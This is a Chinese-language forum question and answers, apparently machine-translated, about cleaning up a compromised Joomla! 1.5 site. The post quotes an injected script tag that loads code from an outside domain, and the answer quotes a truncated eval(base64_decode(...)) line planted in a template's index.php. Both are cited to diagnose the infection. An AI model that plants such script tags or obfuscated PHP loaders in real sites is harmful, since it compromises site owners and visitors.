2011-12-07 27 views
0

我的Joomla! 1.5网站近日牺牲品似乎是XSS攻击(我是小白,当谈到这个东西)......下面的代码注入部位(地方)Joomla! 1.5站点成为XSS的受害者

<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script> 

和我米不知道确切的地方。我搜索了数据库以及文件,结果只找到零。有什么明显的我失踪了吗?

+0

你是否特意为这个文本grep文件夹?我已经看到注入实际上创建了一个包含大量编码文本(当未编码读取为url时)的新工作表 - 然后它们包含一段php,它简单地解开编码文本的编码并将其插入任何页面/模块php代码从中运行。在这种情况下,您将永远无法看到: 使得无法'追踪',检查错误日志并查看有关弹出的任何错误;获取NoScript和Firebug,并查看JS正在加载哪个位置。 – Hanny

+0

如果链接位于标签之后,那么它可能是直接在你的模板的index.php文件(或perhap的Joomla的主要index.php文件)中编辑的。如果关闭javascript时,html不存在,那么它可能是已编辑过的javascript文件 - 通常它们只是在模板的一个.js文件的末尾附加一行或两行。另一种可能性 - 如果html存在于“组件区域”内,即在您的文章中,那么它们有通过sql注入直接插入你的数据库中的每一篇文章的HTML。什么版本的Joomla 1.5是1.5。? –

回答

2

我的网站也成为这次袭击的受害者,仍在调查中。这不是XSS攻击,你的服务器文件被泄露。看在索引PHP文件系统模板中,你会发现这样的代码块:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb.....> 

的使用Base64编码字符串是PHP代码,做各种讨厌的东西。